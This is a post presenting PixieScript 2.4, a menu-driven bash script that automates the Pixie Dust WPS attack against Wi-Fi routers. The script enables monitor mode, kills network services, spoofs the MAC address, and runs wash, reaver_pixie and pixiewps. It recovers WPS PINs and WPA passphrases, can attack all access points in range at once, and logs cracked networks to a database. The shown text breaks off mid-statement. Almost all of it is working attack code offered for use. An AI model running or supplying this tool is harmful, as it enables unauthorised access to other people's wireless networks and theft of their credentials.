PixieScript (English) 2.4

Automation of the new Pixie WPS vulnerabilities

    FEATURES
    - Based on the new version (1.0) of PixieWps by wiire.
    - In principle, the attack only works against APs with a Broadcom or Ralink chipset.
    - Can automatically attack all access points within range.
    - Can attack a single AP.
    - Detects processes that may interfere with the card's monitor mode and, if you wish, stops them and relaunches them automatically.
    - Contains database of known vulnerable BSSIDs



    Code:
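    #!/bin/bash
    #
    # PixieScript: menu-driven wrapper around airmon-ng, wash, reaver_pixie,
    # airodump-ng and pixiewps. It is started from a directory that holds
    # LOGS/, SCRIPTS/ (with the "database" helper) and PIXIESCRIPT_KEYS/.
    #
    # Trust boundaries a reviewer should keep in mind:
    #   - ESSIDs, manufacturer strings and tool log lines come from radio
    #     traffic. They are printed with printf '%s' after control characters
    #     are stripped, and are never used verbatim as a file name.
    #   - Recovered PINs and passphrases are credentials; the result file is
    #     created with owner-only permissions.
    #   - Operator input is matched against a pattern before it reaches awk,
    #     head, sed or shell arithmetic.

    # Script version
    VERSION="v2.4"

    # Colour sequences (expanded by echo -e / printf %b)
    ESC_SEQ="\x1b["
    COL_RESET=$ESC_SEQ"39;49;00m"
    ROJO=$ESC_SEQ"31;01m"
    VERDE=$ESC_SEQ"32;01m"
    AMARILLO=$ESC_SEQ"33;01m"
    AZUL=$ESC_SEQ"34;01m"
    CYAN=$ESC_SEQ"36;01m"

    # "SI" once an interface is in monitor mode, so that switching or repeating
    # an attack type does not ask for the card again.
    HEMOS_ELEGIDO_INTERFACE="NO"
    # "SI" when network services were stopped and must be restarted on exit.
    HEMOS_MATADO_PROCESOS="NO"

    # Working directories, relative to the start directory.
    CARPETA_LOGS="$PWD/LOGS/"
    CARPETA_SCRIPTS="$PWD/SCRIPTS/"
    CARPETA_KEYS="$PWD/PIXIESCRIPT_KEYS/"

    # wash output, raw and sorted
    WASH_LOG=$CARPETA_LOGS"WASH.LOG"
    WASH_SORT_LOG=$CARPETA_LOGS"WASH_SORT.LOG"
    # Scratch log shared by airmon-ng, reaver_pixie and pixiewps
    ARCHIVO_LOG=$CARPETA_LOGS"VARIOS.LOG"
    # BSSIDs tried in this session for which reaver produced no data
    SIN_DATOS="$PWD/LOGS/SINDATOS.LOG"
    # BSSIDs tried in this session for which pixiewps found no PIN
    PROBADAS="$PWD/LOGS/PROBADAS.LOG"

    # Patterns used to validate operator input and parsed fields.
    PATRON_NUMERO='^[0-9]{1,6}$'
    # Second hex digit must be even: same rule the per-character check applied.
    PATRON_MAC='^[0-9A-Fa-f][02468ACEace](:[0-9A-Fa-f]{2}){5}$'

    ##################################################################
    ##                      SMALL SHARED HELPERS                    ##
    ##################################################################

    # Print $1 with control characters removed, so a crafted ESSID cannot
    # inject terminal escape sequences.
    texto_seguro() {
      printf '%s' "${1//[[:cntrl:]]/}"
    }

    # Turn $1 into a single path component: everything outside [A-Za-z0-9._-]
    # becomes "_", so "/" and ".." sequences cannot leave the target directory.
    nombre_archivo_seguro() {
      local limpio=${1//[^A-Za-z0-9._-]/_}
      printf '%s' "${limpio:-sin_nombre}"
    }

    # Dump the scratch log without control characters (tab and newline kept).
    mostrar_log() {
      tr -d '\000-\010\013-\037\177' < "$ARCHIVO_LOG"
    }

    # Append BSSID $1 to list file $2 unless it is already listed.
    registrar_mac() {
      local mac=$1 archivo=$2
      touch -- "$archivo"
      grep -qF -- "$mac" "$archivo" || printf '%s\n' "$mac" >> "$archivo"
    }

    # Print the kernel driver name bound to interface $1 (empty if none).
    driver_de_interfaz() {
      local enlace
      enlace=$(readlink "/sys/class/net/$1/device/driver") || return
      printf '%s\n' "${enlace##*/}"
    }

    # Take the text after the last ":" of log line $1 and join its
    # whitespace-separated tokens with ":".
    campo_hex() {
      local -a partes
      read -r -a partes <<< "${1##*:}"
      local IFS=:
      printf '%s' "${partes[*]}"
    }

    ##################################################################
    ##                           MAIN MENU                          ##
    ##################################################################

    # Show the main menu and dispatch the chosen action. Every action ends by
    # calling menu again or by exiting through limpiar, so menu never returns.
    menu() {
      local accion
      clear
      echo -e "${CYAN}Pixie Dust Script $VERSION por 5.1${COL_RESET}"
      echo ""
      echo -e "${VERDE} 1. List vulnerable known MACs"
      echo ""
      echo -e " 2. Attacking a particular AP"
      echo ""
      echo -e " 3. Available attack AP"
      echo ""
      echo -e " 4. Exit${COL_RESET}"
      echo ""
      echo -en "${CYAN}Select an option and press ENTER: ${COL_RESET}"
      # On end-of-input leave cleanly instead of re-entering the menu forever.
      read -r accion || limpiar
      case "$accion" in
        1) listar_macs_vulnerables ;;
        2) ataque_individual ;;
        3) ataque_completo ;;
        4) limpiar ;;
        *) menu ;;
      esac
    }

    # Ask the database helper to list the BSSIDs it knows as affected.
    listar_macs_vulnerables() {
      clear
      "$CARPETA_SCRIPTS"./database v
      echo ""
      echo -en "${CYAN}Press ENTER to return to menu ... ${COL_RESET}"
      read -r
      menu
    }

    # First use only: pick a card, put it in monitor mode, offer a MAC change.
    preparar_interface() {
      [[ "$HEMOS_ELEGIDO_INTERFACE" == "NO" ]] || return 0
      desactivar_todos_monX
      seleccionar_tarjeta
      activar_modo_monitor
      if [[ "$MONITOR_ACTIVADO" != "SI" ]]; then
        echo -e "${ROJO}Error putting in monitor mode interface of choice ${COL_RESET}"
        menu
      fi
      HEMOS_ELEGIDO_INTERFACE="SI"
      cambiar_mac
    }

    # Single-AP flow: target data is typed in by the operator.
    ataque_individual() {
      preparar_interface
      tiempo_reaver
      datos_ap_atacar
      if (( todo_ok == 1 )); then
        menu
      fi
      MODO_AUTOMATICO="NO"
      atacar_ap
      echo
      echo -e "${AMARILLO}ATTACK FINISHED, PRESS ENTER TO RETURN TO MENU${COL_RESET}"
      read -r
      menu
    }

    # Scan flow: run wash, then let the operator choose from its results.
    ataque_completo() {
      preparar_interface
      tiempo_wash
      tiempo_reaver
      lanzar_wash
      analizar_wash_log
    }

    ##################################################################
    ##     PART OF SCRIPT TO DRIVE INTERFACES based on GoyScript    ##
    ##################################################################

    # Stop every interface whose name contains "mon".
    desactivar_todos_monX() {
      local -a monitores
      local mon
      mapfile -t monitores < <(iwconfig --version | grep "Recommend" \
        | awk '{print $1}' | grep mon)
      for mon in "${monitores[@]}"; do
        airmon-ng stop "$mon" > /dev/null 2>&1
      done
    }

    # List the wireless cards and set INTERFAZ to the chosen one.
    # Exits through limpiar when no card is found.
    seleccionar_tarjeta() {
      local -a tarjetas
      local i
      clear
      mapfile -t tarjetas < <(iwconfig --version | grep "Recommend" \
        | awk '{print $1}' | sort)
      N_TARJETAS_WIFI=${#tarjetas[@]}
      TARJETAS_WIFI_DISPONIBLES="${tarjetas[*]}"
      if (( N_TARJETAS_WIFI == 0 )); then
        echo -e "${ROJO}ERROR: No WiFi card was detected${COL_RESET}"
        echo ""
        echo -en "${CYAN}Press ENTER to exit... ${COL_RESET}"
        read -r
        limpiar
      fi

      echo -e "${CYAN}WiFi cards available:${COL_RESET}"
      echo -e "$AMARILLO"
      {
        echo -e "Nº INTERFACE DRIVER${COL_RESET}"
        for i in "${!tarjetas[@]}"; do
          printf '%s %s %s\n' "$((i + 1))" "${tarjetas[i]}" \
            "$(driver_de_interfaz "${tarjetas[i]}")"
        done
      } | column -t

      if (( N_TARJETAS_WIFI > 1 )); then
        echo -e "\n\n${CYAN}Select a WiFi card:\c${COL_RESET}"
        read -r OPCION
        # Numeric comparison on a digits-only value: a string comparison
        # would rank "2" above "10", and raw text must not reach arithmetic.
        until [[ "$OPCION" =~ $PATRON_NUMERO ]] \
          && (( 10#$OPCION >= 1 && 10#$OPCION <= N_TARJETAS_WIFI )); do
          echo -en "${ROJO}\aOPCIÓN NO VÁLIDA${COL_RESET}"
          sleep 1
          echo -en "${CYAN}\rSelecciona una tarjeta WiFi: \c${COL_RESET}"
          read -r OPCION
        done
        OPCION=$((10#$OPCION))
        INTERFAZ=${tarjetas[OPCION - 1]}
        echo -e "\n"
        echo -e "${AMARILLO}You have selected: $INTERFAZ ${COL_RESET}"
        echo
      else
        OPCION=1
        INTERFAZ=${tarjetas[0]}
        echo
        echo -e "${AMARILLO}Only detected a WiFi card: $INTERFAZ ${COL_RESET}"
        echo
      fi
    }

    # Reload the driver, stop interfering services and start monitor mode.
    # Sets MONITOR_ACTIVADO to SI/NO and, on success, INTERFACE_MONITOR.
    activar_modo_monitor() {
      local linea campo
      reiniciar_interface
      matar_procesos
      echo ""
      echo -e "${AMARILLO}Starting monitor mode $INTERFAZ${COL_RESET}"
      airmon-ng start "$INTERFAZ" &> "$ARCHIVO_LOG"
      # Default to NO so an empty log cannot leave the flag unset.
      MONITOR_ACTIVADO="NO"
      while IFS= read -r linea; do
        if [[ $linea == *enabled* ]]; then
          # Fifth whitespace-separated field of the "enabled" line, minus ")".
          read -r _ _ _ _ campo _ <<< "$linea"
          INTERFACE_MONITOR=${campo//)/}
          MONITOR_ACTIVADO="SI"
          echo -e "${AMARILLO}Monitor mode enabled on  $INTERFACE_MONITOR ${COL_RESET}"
          break
        fi
      done < "$ARCHIVO_LOG"
    }

    # Offer to stop dhcpcd, NetworkManager and wpa_supplicant, then remove any
    # leftover monitor interface. Records the choice in HEMOS_MATADO_PROCESOS.
    matar_procesos() {
      local procesos
      procesos=$(ps -A | grep -e dhcpcd -e NetworkManager -e wpa_supplicant \
        | grep -v grep)
      if [[ -n "$procesos" ]]; then
        echo -e "${AMARILLO}Found processes that could interfere with the operation of the network card in monitor mode${COL_RESET}"
        echo ""
        # Fourth column of "ps -A" is the command name; one per line.
        awk '{ print $4 }' <<< "$procesos"
        echo ""
        echo -en "${CYAN}¿ Want to stop (y/n) ?${COL_RESET}"
        read -r decison_matar_procesos
        # The two prompts advertise y/n and s/n, so both spellings of "yes"
        # are accepted here and acted on below.
        until [[ "$decison_matar_procesos" == [yYsSnN] ]]; do
          echo ""
          echo -e "${ROJO}INVALID OPTION${COL_RESET}"
          echo -en "${AMARILLO}Want to stop (s/n) ? ${COL_RESET}"
          read -r decison_matar_procesos
        done
        if [[ "$decison_matar_procesos" == [yYsS] ]]; then
          echo ""
          echo -e "${AMARILLO}\nDeteniendo NetworkManager${COL_RESET}"
          /etc/rc.d/rc.networkmanager stop
          echo -en "${AMARILLO}Deteniendo dhcpcd ....${COL_RESET}"
          killall dhcpcd &> /dev/null
          echo -e "${AMARILLO}Ok${COL_RESET}"
          echo -en "${AMARILLO}wpa_supplicant detected.... ${COL_RESET}"
          killall -9 wpa_supplicant &> /dev/null
          echo -e "${AMARILLO}Ok${COL_RESET}"
          HEMOS_MATADO_PROCESOS="SI"
        else
          HEMOS_MATADO_PROCESOS="NO"
        fi
      fi
      desactivar_todos_monX
    }

    # Unload and reload the driver of INTERFAZ.
    reiniciar_interface() {
      DRIVER=$(driver_de_interfaz "$INTERFAZ")
      echo -e "${AMARILLO}Restarting the Interface $INTERFAZ $DRIVER...${COL_RESET}"
      echo ""
      # Nothing to reload when no driver could be resolved.
      [[ -n "$DRIVER" ]] || return 0
      rmmod -f "$DRIVER" > /dev/null 2>&1
      if [[ "$DRIVER" == "ath9k_htc" ]]; then
        # Wait until the interface has gone away with its module.
        while ifconfig "$INTERFAZ" > /dev/null 2>&1; do :; done
      fi
      modprobe "$DRIVER" > /dev/null 2>&1
      if [[ "$DRIVER" == "ath9k_htc" ]]; then
        # Wait until the interface is back.
        until ifconfig "$INTERFAZ" > /dev/null 2>&1; do :; done
      fi
    }

    ##################################################################
    #####            MAC ADDRESS CHANGE AND VALIDATION            ####
    ##################################################################

    # Ask whether to change the MAC of INTERFACE_MONITOR and how.
    cambiar_mac() {
      local cambiar como_cambiar
      echo
      echo -en "${CYAN}You want to change the MAC $INTERFACE_MONITOR ? (s/n)${COL_RESET}"
      read -r cambiar
      until [[ "$cambiar" == [sSnN] ]]; do
        echo
        echo -e "${ROJO}Opción incorrecta${COL_RESET}"
        echo -en "${CYAN}Quieres cambiar la MAC de $INTERFACE_MONITOR ? (s/n)${COL_RESET}"
        read -r cambiar
      done
      if [[ "$cambiar" == [sS] ]]; then
        echo
        echo -e "${VERDE}1. Randomly${COL_RESET}"
        echo -e "${VERDE}2. Manually${COL_RESET}"
        echo ""
        echo -en "${CYAN}How you want to change(1/2)?${COL_RESET}"
        read -r como_cambiar
        until [[ "$como_cambiar" == [12] ]]; do
          echo
          echo -en "${ROJO}Incorrect option${COL_RESET}${CYAN}, select 1 for random change or 2 to manually ${COL_RESET}"
          read -r como_cambiar
        done
        case "$como_cambiar" in
          1)
            cambio_mac_random
            ;;
          2)
            echo
            echo -e "${CYAN}Enter the desired MAC and press ENTER : ${COL_RESET}"
            read -r MAC_A_VALIDAR
            validar_mac
            while (( mac_correcta == 1 )); do
              echo -e "${ROJO}Error in the format of the MAC${COL_RESET}"
              echo -e "${CYAN}Enter the desired MAC and press ENTER : ${COL_RESET}"
              read -r MAC_A_VALIDAR
              validar_mac
            done
            cambio_mac_manual
            ;;
        esac
        echo
        ifconfig "$INTERFACE_MONITOR"
        echo
        echo -e "${CYAN}Press ENTER to continue${COL_RESET}"
        read -r
      else
        echo
      fi
    }

    cambio_mac_random() {
      ifconfig "$INTERFACE_MONITOR" down
      macchanger -a "$INTERFACE_MONITOR"
      ifconfig "$INTERFACE_MONITOR" up
    }

    # Uses MAC_A_VALIDAR, the value cambiar_mac has just validated.
    cambio_mac_manual() {
      ifconfig "$INTERFACE_MONITOR" down
      macchanger -m "$MAC_A_VALIDAR" "$INTERFACE_MONITOR"
      ifconfig "$INTERFACE_MONITOR" up
    }

    # Check MAC_A_VALIDAR: six colon-separated hex octets whose second digit
    # is even. Sets mac_correcta to 0 (valid) or 1 (invalid).
    validar_mac() {
      if [[ "$MAC_A_VALIDAR" =~ $PATRON_MAC ]]; then
        mac_correcta=0
      else
        mac_correcta=1
      fi
    }

    ##################################################################
    #####              DATA SUPPLIED BY THE OPERATOR              ####
    ##################################################################

    # Read the reaver time limit into TIEMPO_REAVER (default 40).
    tiempo_reaver() {
      echo ""
      echo -en "${CYAN}Enter the maximum time in seconds that reaver is trying to prove a pin : ${COL_RESET}"
      read -r TIEMPO_REAVER
      if [[ ! "$TIEMPO_REAVER" =~ $PATRON_NUMERO ]]; then
        echo -e "${ROJO}Error, the value entered is not correct, the default value applies (40)${COL_RESET}"
        TIEMPO_REAVER=40
        echo -e "${CYAN}Press ENTER to continue${COL_RESET}"
        read -r
      fi
      # Force base 10 so "040" is not read as octal in later arithmetic.
      TIEMPO_REAVER=$((10#$TIEMPO_REAVER))
    }

    # Read the wash scan time into TIEMPO_WASH (default 40).
    tiempo_wash() {
      echo ""
      echo -en "${CYAN}Enter the time in seconds that wash is trying to find targets : ${COL_RESET}"
      read -r TIEMPO_WASH
      if [[ ! "$TIEMPO_WASH" =~ $PATRON_NUMERO ]]; then
        echo -e "${ROJO}Error, the value entered is not correct, the value is applied by default (40)${COL_RESET}"
        TIEMPO_WASH=40
        echo -e "${CYAN}Press ENTER to continue${COL_RESET}"
        read -r
      fi
      TIEMPO_WASH=$((10#$TIEMPO_WASH))
    }

    # Read BSSID, ESSID and channel for the single-AP flow.
    # Sets todo_ok to 0 on success; returns 1 when the BSSID is malformed.
    datos_ap_atacar() {
      todo_ok=1
      echo ""
      echo ""
      echo -en "${CYAN}Enter the BSSID to attack: ${COL_RESET}"
      read -r mac_a_atacar
      MAC_A_VALIDAR=$mac_a_atacar
      validar_mac
      if (( mac_correcta == 1 )); then
        echo -e "${ROJO}Error in the format of the MAC entered, press ENTER to return to menu${COL_RESET}"
        read -r
        return "$todo_ok"
      fi
      echo -en "${CYAN}Enter SSID to attack: ${COL_RESET}"
      read -r nombre
      nombre=$(texto_seguro "$nombre")
      echo -en "${CYAN}Enter channel : ${COL_RESET}"
      read -r canal
      until [[ "$canal" =~ $PATRON_NUMERO ]]; do
        echo -e "${ROJO}Error, the channel entered is not correct${COL_RESET}"
        echo -en "${CYAN}Enter channel : ${COL_RESET}"
        read -r canal
      done
      todo_ok=0
    }

    ##################################################################
    #####                      ATTACK PROCESS                   ######
    ##################################################################

    # Poll once per second, for at most TIEMPO_REAVER seconds, until no process
    # matching "reaver" is left. vez selects the messages (1 = data gathering,
    # 2 = key recovery). Sets and returns todo_ok: 0 finished, 1 timed out.
    esperar_acabar_reaver() {
      local A ultima_linea nueva_linea
      for ((A = 1; A <= TIEMPO_REAVER; A++)); do
        sleep 1s
        if ! ps -A | grep -q reaver; then
          todo_ok=0
          return "$todo_ok"
        fi
        if (( A == TIEMPO_REAVER )); then
          # ESSID goes through %s: echo -e would expand backslashes in it.
          if (( vez == 1 )); then
            printf '%bHAVE NOT BEEN ABLE TO OBTAIN THE NECESSARY DATA %s, Reaver attack failed%b\n' \
              "$ROJO" "$nombre" "$COL_RESET"
          else
            printf '%bHAVE NOT BEEN ABLE TO RECOVER THE KEY WPA %s%b\n' \
              "$ROJO" "$nombre" "$COL_RESET"
          fi
          echo ""
          matar_reaver
          todo_ok=1
          return "$todo_ok"
        fi
        TIEMPO_RESTANTE=$((TIEMPO_REAVER - A))
        if (( vez == 1 )); then
          clear
          printf '%bREAVER WORKING WITH BSSID %s, ESSID %s DURATION %s s ...%b\n' \
            "$AMARILLO" "$mac_a_atacar" "$nombre" "$TIEMPO_RESTANTE" "$COL_RESET"
          if [[ "$DEBUG" == "SI" ]]; then
            mostrar_log
          fi
        elif (( vez == 2 )) && [[ "$DEBUG" == "SI" ]]; then
          # Echo log line number A when it differs from the line before it.
          ultima_linea=$(head -n "$((A - 1))" "$ARCHIVO_LOG" | tail -n 1)
          nueva_linea=$(head -n "$A" "$ARCHIVO_LOG" | tail -n 1)
          if [[ -n "$nueva_linea" && "$nueva_linea" != "$ultima_linea" ]]; then
            texto_seguro "$nueva_linea"
            echo
          fi
        fi
      done
    }

    matar_reaver() {
      killall reaver_pixie &> /dev/null
    }

    # Pull PKe, PKr, E-Hash1, E-Hash2, AuthKey and E-Nonce from the reaver log.
    # Sets and returns todo_ok: 0 when all six are present, 1 otherwise.
    extraer_datos_reaver() {
      local linea par variable
      todo_ok=1
      # Start empty so values of a previously processed AP are never reused.
      PKe="" PKr="" EHash1="" EHash2="" AuthKey="" Enrollee=""
      echo -e "${AMARILLO}REMOVING DATA ...${COL_RESET}"
      while IFS= read -r linea; do
        if [[ $linea == *PKe* ]]; then PKe=$(campo_hex "$linea"); fi
        if [[ $linea == *PKr* ]]; then PKr=$(campo_hex "$linea"); fi
        if [[ $linea == *E-Hash1* ]]; then EHash1=$(campo_hex "$linea"); fi
        if [[ $linea == *E-Hash2* ]]; then EHash2=$(campo_hex "$linea"); fi
        if [[ $linea == *AuthKey* ]]; then AuthKey=$(campo_hex "$linea"); fi
        if [[ $linea == *E-Nonce* ]]; then Enrollee=$(campo_hex "$linea"); fi
      done < "$ARCHIVO_LOG"

      # "variable:label" pairs, checked in the order the messages are defined.
      for par in PKr:PKR PKe:PKE EHash1:EHASH1 EHash2:EHASH2 \
        AuthKey:AUTHKEY "Enrollee:Enrollee Nonce"; do
        variable=${par%%:*}
        if [[ -z "${!variable}" ]]; then
          echo -e "${ROJO}HAVE NOT BEEN ABLE TO GET THE KEY ${par#*:}${COL_RESET}"
          todo_ok=1
          return "$todo_ok"
        fi
      done

      printf 'PKr :%b %s %b\n' "$VERDE" "$PKr" "$COL_RESET"
      printf 'PKe :%b %s %b\n' "$VERDE" "$PKe" "$COL_RESET"
      printf 'EHASH1 :%b %s %b\n' "$VERDE" "$EHash1" "$COL_RESET"
      printf 'EHASH2 :%b %s %b\n' "$VERDE" "$EHash2" "$COL_RESET"
      printf 'AuthKey:%b %s %b\n' "$VERDE" "$AuthKey" "$COL_RESET"
      printf 'E-Nonce:%b %s %b\n' "$VERDE" "$Enrollee" "$COL_RESET"
      todo_ok=0
      return "$todo_ok"
    }

    # Run pixiewps on the extracted values and process its output.
    lanzar_pixiewps() {
      echo ""
      echo -e "${AMARILLO}TESTING WITH PIXIEWPS 1.0 by wiire${COL_RESET}"
      pixiewps -e "$PKe" -r "$PKr" -s "$EHash1" -z "$EHash2" -a "$AuthKey" \
        -n "$Enrollee" &> "$ARCHIVO_LOG"
      mostrar_log
      analizar_log_pixiewps
    }

    # Act on the first "WPS pin" line of the pixiewps log: record a miss in
    # PROBADAS, or run reaver_pixie with the PIN and store the outcome.
    analizar_log_pixiewps() {
      local -a lineas
      local linea archivo_datos
      # Snapshot first: the reaver_pixie run below overwrites the same log.
      mapfile -t lineas < "$ARCHIVO_LOG"
      for linea in "${lineas[@]}"; do
        [[ $linea == *"WPS pin"* ]] || continue
        if [[ $linea == *"not found"* ]]; then
          registrar_mac "$mac_a_atacar" "$PROBADAS"
          return
        fi
        # Second ":"-separated field, without surrounding blanks.
        PIN_WPS=$(awk -F":" '{ gsub(/^[ \t]+|[ \t]+$/, "", $2); print $2 }' \
          <<< "$linea")
        echo -e "${AMARILLO}Retrieving WPA wait ...${COL_RESET}"
        reaver_pixie -i "$INTERFACE_MONITOR" -b "$mac_a_atacar" -a -D \
          -c "$canal" -p "$PIN_WPS" &> "$ARCHIVO_LOG"
        vez=2
        esperar_acabar_reaver
        if (( todo_ok == 0 )); then
          mostrar_log
          recuperar_clave_wpa
        else
          CLAVE_WPA="COULD NOT RECOVER THE KEY WPA"
        fi
        # The ESSID is attacker-chosen text: reduce it to one safe path
        # component, and keep the credentials file private to its owner.
        archivo_datos="$(nombre_archivo_seguro "$nombre").datos"
        mkdir -p -- "$CARPETA_KEYS"
        (
          umask 077
          printf 'ESSID : %s\nBSSID : %s\nPIN WPS : %s\nKEY WPA : %s\n' \
            "$nombre" "$mac_a_atacar" "$PIN_WPS" "$CLAVE_WPA" \
            > "$CARPETA_KEYS$archivo_datos"
          chmod 600 -- "$CARPETA_KEYS$archivo_datos"
        )
        echo ""
        printf '%bPIN AND DUMPS WPA KEY TO FILE  %s%b\n' \
          "$AMARILLO" "$archivo_datos" "$COL_RESET"
        agregar_mac_vulnerable
        return
      done
    }

    # Set CLAVE_WPA from the last "WPA PSK" line of the log.
    recuperar_clave_wpa() {
      local linea resto
      CLAVE_WPA=""
      while IFS= read -r linea; do
        if [[ $linea == *"WPA PSK"* ]]; then
          # Text between the first and the last single quote, so a
          # passphrase containing ":" is not cut short.
          resto=${linea#*\'}
          CLAVE_WPA=${resto%\'*}
        fi
      done < "$ARCHIVO_LOG"
    }

    # Capture for five seconds with airodump-ng and read the <manuf> value of
    # the resulting kismet netxml file into fabricante.
    datos_router() {
      local datos="${CARPETA_LOGS}datos"
      rm -f -- "$datos"* &> /dev/null
      echo ""
      echo -e "${AMARILLO}Capturing data from the AP, wait 5 seconds${COL_RESET}"
      # Capture on the interface chosen earlier, not on a fixed name.
      (airodump-ng --bssid "$mac_a_atacar" --channel "$canal" --manufacturer \
        -w "$datos" "$INTERFACE_MONITOR" &> /dev/null &)
      sleep 5
      killall airodump-ng
      fabricante=$(grep "<manuf>" "$datos-01.kismet.netxml" \
        | sed 's/\///g' | sed 's/<manuf>//g')
      fabricante=$(texto_seguro "$fabricante")
      rm -f -- "$datos"* &> /dev/null
    }

    # Add the current AP to the helper's database unless it is already there.
    agregar_mac_vulnerable() {
      local -a extra
      ESTA_EN_DATABASE=$("$CARPETA_SCRIPTS"./database b "$mac_a_atacar")
      if [[ "$ESTA_EN_DATABASE" == "NO" ]]; then
        # The helper receives manufacturer and ESSID as separate words; split
        # them with read -a so a "*" in an ESSID is not expanded as a glob.
        # NOTE(review): the helper's argument contract is not visible here.
        read -r -a extra <<< "$fabricante $nombre"
        "$CARPETA_SCRIPTS"./database a "$mac_a_atacar" "${extra[@]}"
        echo -e "${AMARILLO}AP ADDED TO THE DATABASE${COL_RESET}"
      else
        echo -e "${AMARILLO}AP WAS IN THE DATABASE, will not be added${COL_RESET}"
      fi
    }

    # Run wash for TIEMPO_WASH seconds, writing to WASH_LOG.
    lanzar_wash() {
      local A
      rm -f -- "$WASH_LOG" &> /dev/null
      clear
      wash -C -D -i "$INTERFACE_MONITOR" &> "$WASH_LOG"
      echo -e "${AMARILLO}BUSCANDO OBJETIVOS CON WASH, ESPERA $TIEMPO_WASH s ...${COL_RESET}"
      for ((A = 1; A <= TIEMPO_WASH; A++)); do
        sleep 1s
        if (( A == TIEMPO_WASH )); then
          killall wash &> /dev/null
        else
          clear
          TIEMPO_RESTANTE=$((TIEMPO_WASH - A))
          echo -e "${AMARILLO}LOOKING OBJECTS WASH, WAIT $TIEMPO_RESTANTE s ...${COL_RESET}"
          echo ""
        fi
      done
    }

    # Sort the wash results into WASH_SORT_LOG and print them numbered and
    # coloured by what is known about each BSSID.
    cat_wash_log() {
      local LINE MAC_WASH color espacios contador=1
      clear
      echo -e "${ROJO}PROBADAS Y NO VULNERABLES${COL_RESET}${AMARILLO} PROBADAS PERO SIN CONSEGUIR DATOS PARA EL ATAQUE${COL_RESET}${VERDE} VULNERABLES${COL_RESET} NO PROBADAS"
      echo ""
      # Drop the six header lines and sort on the text after the first "-".
      sed '1,6d' "$WASH_LOG" | sort -t"-" -k2n > "$WASH_SORT_LOG"
      echo -e "${CYAN}Nº BSSID Channel RSS WPS Version Locked ESSID${COL_RESET}"
      echo -e "${CYAN}---------------------------------------------------------------------------${COL_RESET}"
      touch -- "$PROBADAS" "$SIN_DATOS"
      while read -r LINE; do
        espacios=""
        if (( contador < 1000 )); then espacios=" "; fi
        MAC_WASH="${LINE:0:17}"
        # stdin is detached so the helper cannot consume the list being read.
        ESTA_EN_DATABASE=$("$CARPETA_SCRIPTS"./database b "$MAC_WASH" < /dev/null)
        if [[ "$ESTA_EN_DATABASE" == "SI" ]]; then
          color=$VERDE
        elif [[ -n "$MAC_WASH" ]] && grep -qF -- "$MAC_WASH" "$PROBADAS"; then
          color=$ROJO
        elif [[ -n "$MAC_WASH" ]] && grep -qF -- "$MAC_WASH" "$SIN_DATOS"; then
          color=$AMARILLO
        else
          color=""
        fi
        # The line carries the broadcast ESSID: strip control characters and
        # print it with %s so it cannot drive the terminal.
        if [[ -n "$color" ]]; then
          printf '%b%s%s%s%b\n' "$color" "$contador" "$espacios" \
            "${LINE//[[:cntrl:]]/}" "$COL_RESET"
        else
          printf '%s%s%s\n' "$contador" "$espacios" "${LINE//[[:cntrl:]]/}"
        fi
        contador=$((contador + 1))
      done < "$WASH_SORT_LOG"
    }

    # Show the scan results and act on the choice: a row number, T for every
    # row, M for the main menu. Repeats until the operator leaves through M.
    analizar_wash_log() {
      while :; do
        clear
        cat_wash_log
        echo ""
        echo -en "${CYAN}Choose number of BSSID, press T to attack them all automatically, M to return to the main menu ${COL_RESET}"
        read -r decision
        maximo=$(wc -l < "$WASH_SORT_LOG")
        # Only digits may reach the numeric test: [[ x -lt y ]] evaluates its
        # operands as arithmetic expressions.
        until [[ "$decision" == [mMtT] ]] || {
          [[ "$decision" =~ $PATRON_NUMERO ]] \
            && (( 10#$decision >= 1 && 10#$decision <= maximo ))
        }; do
          echo ""
          echo -e "${ROJO}OPCIÓN NO VÁLIDA${COL_RESET}"
          sleep 1
          echo -en "${CYAN}Choose number of BSSID, press T to attack them all automatically, M to return to the main menu ${COL_RESET}"
          read -r decision
        done
        case "$decision" in
          m | M)
            menu
            ;;
          t | T)
            echo
            MODO_AUTOMATICO="SI"
            ataque_automatico
            ;;
          *)
            decision=$((10#$decision))
            MODO_AUTOMATICO="NO"
            atacar_ap_aut
            echo -e "${CYAN}Attack finished, press ENTER to continue${COL_RESET}"
            read -r
            ;;
        esac
      done
    }

    # Process every row of the sorted scan list in turn.
    ataque_automatico() {
      local MA
      for ((MA = 1; MA <= maximo; MA++)); do
        decision=$MA
        atacar_ap_aut
      done
    }

    # Load row number $decision of the sorted scan list (BSSID, channel, lock
    # flag, ESSID) and hand it to atacar_ap unless the AP reports a WPS lock.
    atacar_ap_aut() {
      local linea locked
      linea=$(sed -n "${decision}p" "$WASH_SORT_LOG")
      # Fields: 1 BSSID, 2 channel, 5 lock flag, 6.. ESSID (may hold blanks).
      read -r mac_a_atacar canal _ _ locked nombre <<< "$linea"
      nombre=$(texto_seguro "$nombre")
      # Skip rows that do not parse as "BSSID channel ...".
      MAC_A_VALIDAR=$mac_a_atacar
      validar_mac
      if (( mac_correcta != 0 )) || [[ ! "$canal" =~ $PATRON_NUMERO ]]; then
        return
      fi
      # NOTE(review): stock wash prints Yes/No in this column; confirm that
      # the wash build used with this script prints "SI".
      if [[ "$locked" == "SI" ]]; then
        if [[ "$MODO_AUTOMATICO" == "NO" ]]; then
          echo -e "${AMARILLO}AP locked, press ENTER to continue with another AP${COL_RESET}"
          read -r
        fi
        # return, not continue: there is no enclosing loop in this function.
        return
      fi
      atacar_ap
    }

    # Run the data-gathering pass against the selected AP and, when it yields
    # all values, continue with pixiewps. Returns 1 when the AP was recorded
    # in SIN_DATOS. The callers show their own "press ENTER" prompt.
    atacar_ap() {
      clear
      rm -f -- "${CARPETA_LOGS:?}"*.cap &> /dev/null
      ifconfig "$INTERFAZ" up &> /dev/null
      echo -e "${CYAN}LAUNCHING REAVER, WAIT $TIEMPO_REAVER s ...${COL_RESET}"
      reaver_pixie --FINALIZAR -i "$INTERFACE_MONITOR" -b "$mac_a_atacar" \
        -c "$canal" -a -n -vv -D > "$ARCHIVO_LOG" 2> /dev/null
      vez=1
      esperar_acabar_reaver
      if (( todo_ok == 1 )); then
        registrar_mac "$mac_a_atacar" "$SIN_DATOS"
        return "$todo_ok"
      fi
      extraer_datos_reaver
      if (( todo_ok == 1 )); then
        registrar_mac "$mac_a_atacar" "$SIN_DATOS"
        return "$todo_ok"
      fi
      echo ""
      datos_router
      echo ""
      printf '%bMANUFACTURER : %b %b %s%b\n' \
        "$AMARILLO" "$COL_RESET" "$VERDE" "$fabricante" "$COL_RESET"
      printf '%bBSSID : %b %b %s%b\n' \
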